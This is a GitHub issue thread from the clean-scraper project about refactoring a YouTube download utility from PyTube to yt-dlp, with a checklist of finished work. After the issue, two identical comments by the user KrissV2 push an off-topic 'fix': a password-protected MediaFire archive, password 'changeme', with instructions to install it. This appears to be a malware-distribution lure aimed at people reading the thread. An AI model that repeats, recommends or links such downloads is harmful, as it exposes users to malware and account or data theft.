### ISSUE TITLE
Refactor YouTube util: PyTube >> YT-DLP

### ISSUE THREAD

**Issue by newsroomdev** [biglocalnews/clean-scraper#99]
## Description

Use `yt_dlp` [library](https://github.com/yt-dlp/yt-dlp/tree/master?tab=readme-ov-file#authentication-options) for more flexibility with downloading and processing YouTube assets. Unblocks @naumansharifwork

### Done

- [x] Write and test code c.f. https://github.com/biglocalnews/clean-scraper/blob/bdcc2237cc01fc3d9687a897ade0e0e9d679e332/clean/utils.py
- [x] ~~Authentication for dev vs prod~~ begun in #128 and #130 

## Related issues

- #81

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
